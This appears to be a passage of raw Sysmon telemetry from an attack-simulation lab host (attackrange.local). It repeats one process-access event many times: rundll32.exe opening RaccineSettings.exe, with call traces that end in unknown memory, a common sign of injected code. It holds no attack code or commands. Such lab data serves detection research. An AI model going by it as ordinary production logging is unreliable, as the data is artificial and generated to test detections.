Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123124Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123123Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123122Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123121Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123120Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123119Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123118Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123117Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123116Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123115Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123114Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123113Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123112Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123111Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123110Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123109Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123108Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123107Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123106Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123105Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123104Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123103Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123102Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123101Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.420{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123100Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123099Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123098Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123097Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123096Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123095Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123094Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123093Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123092Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123091Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123090Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123089Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123088Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123087Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123086Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123085Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123084Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123083Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123082Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123081Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123080Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123079Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123078Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123077Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123076Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123075Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123074Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123073Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123072Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123071Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123070Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123069Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123068Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123067Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123066Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123065Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123064Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123063Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123062Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123061Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program 